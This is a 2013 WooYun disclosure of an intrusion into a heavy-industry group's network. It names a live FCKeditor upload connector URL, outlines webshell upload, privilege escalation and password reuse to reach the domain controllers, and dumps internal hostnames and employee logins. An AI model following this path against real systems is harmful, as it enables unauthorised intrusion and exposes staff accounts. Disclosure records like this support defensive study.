当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032800

漏洞标题:某重工业集团任意文件上传+系统通用密码可导致内网沦陷

相关厂商:某重工业集团

漏洞作者: 煦阳。

提交时间:2013-07-30 14:05

修复时间:2013-09-13 14:06

公开时间:2013-09-13 14:06

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

我什么都没动. 拒绝查水表...
ps:求审核人员改个霸气的名字 XD

详细说明:

http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
低版本 遍历 任意上传
http://218.5.70.231/1.asp htc
提权后用当前帐号密码去IPC DC段.
\\dc 杀..
\\dcbak 杀..
然后....
没然后了.. 过程很简单. 我丢几张图就行了吧~
我什么都没动. 拒绝查水表...
Users currently logged on \\172.30.0.1:
A system error has occurred: 53
Users currently logged on \\172.30.0.5:
-- NETSERVER$
-- fong
-- Acronis Agent User
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_NETSERVER
-- IUSR_NETSERVER
Users currently logged on \\172.30.0.6:
A system error has occurred: 53
Users currently logged on \\172.30.0.7:
-- FAX-SERVER$
-- Administrator
-- Administrator
-- IUSR_BI_BSC
Users currently logged on \\172.30.0.8:
A system error has occurred: 2138
Users currently logged on \\172.30.0.9:
-- NEWCAIWU$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.10:
A system error has occurred: 53
Users currently logged on \\172.30.0.11:
-- BETA-SERVER$
-- Administrator
-- Administrator
-- szz
Users currently logged on \\172.30.0.12:
-- CBMS-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.13:
-- FILE-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- UPLOAD
-- Administrator
-- IUSR_FILESERVER-BAK
-- UPLOAD
-- UPLOAD
-- IUSR_FILESERVER-BAK
-- UPLOAD
Users currently logged on \\172.30.0.15:
A system error has occurred: 53
Users currently logged on \\172.30.0.16:
A system error has occurred: 53
Users currently logged on \\172.30.0.17:
A system error has occurred: 53
Users currently logged on \\172.30.0.18:
A system error has occurred: 53
Users currently logged on \\172.30.0.21:
-- DATASERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.22:
-- BACKUPEXEC$
-- backup
-- IUSR_NETSERVER-BAK
-- backup
-- Administrator
-- backup
-- backup
Users currently logged on \\172.30.0.23:
A system error has occurred: 5
Users currently logged on \\172.30.0.24:
-- FILESERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.27:
-- EAD$
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.28:
-- EAD-BAK$
-- Administrator
Users currently logged on \\172.30.0.29:
A system error has occurred: 64
Users currently logged on \\172.30.0.30:
-- DCBAK$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.32:
-- NETSERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.33:
-- DLP-SERVER$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.34:
A system error has occurred: 64
Users currently logged on \\172.30.0.38:
-- BISERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.45:
A system error has occurred: 53
Users currently logged on \\172.30.0.54:
A system error has occurred: 53
Users currently logged on \\172.30.0.58:
A system error has occurred: 53
Users currently logged on \\172.30.0.80:
A system error has occurred: 53
Users currently logged on \\172.30.0.103:
-- -- huangzc
Users currently logged on \\172.30.0.105:
-- -- aigd
Users currently logged on \\172.30.0.108:
-- -- liangh
Users currently logged on \\172.30.0.109:
-- -- wangyl
Users currently logged on \\172.30.0.115:
A system error has occurred: 5
Users currently logged on \\172.30.0.121:
A system error has occurred: 5
Users currently logged on \\172.30.0.175:
A system error has occurred: 53
Users currently logged on \\172.30.0.176:
A system error has occurred: 53
Users currently logged on \\172.30.0.181:
A system error has occurred: 5
Users currently logged on \\172.30.0.202:
A system error has occurred: 53
Users currently logged on \\172.30.0.207:
-- -- chents
Users currently logged on \\172.30.0.215:
-- KE$
-- Amdin
Users currently logged on \\172.30.0.219:
A system error has occurred: 5
Users currently logged on \\172.30.0.220:
-- -- xufan
-- AvastSoftwareUpdater
Users currently logged on \\172.30.0.221:
-- -- zxf
Users currently logged on \\172.30.0.223:
-- -- guoyj
-- ASPNET
Users currently logged on \\172.30.0.224:
-- suqj
--
Users currently logged on \\172.30.0.225:
-- -- zhangchh
Users currently logged on \\172.30.0.226:
-- -- linfs
Users currently logged on \\172.30.0.251:
-- -- wangl
Users currently logged on \\172.30.0.254:
-- DC$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_DC
-- IUSR_DC
-- IUSR_DC

漏洞证明:

fck.png


dc.png


shebei.png


修复方案:

这个。。

版权声明:转载请注明来源 煦阳。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-08-03 17:18

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-07-30 15:24 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @xsser @疯狗 果然改得很霸气...

  2. 2013-07-30 15:57 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @煦阳。 - - !

  3. 2013-08-03 21:15 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    感谢 @cncert国家互联网应急中心 感谢CCTV. 感谢MTV. 感谢JPAV..有rank了~ 好开心~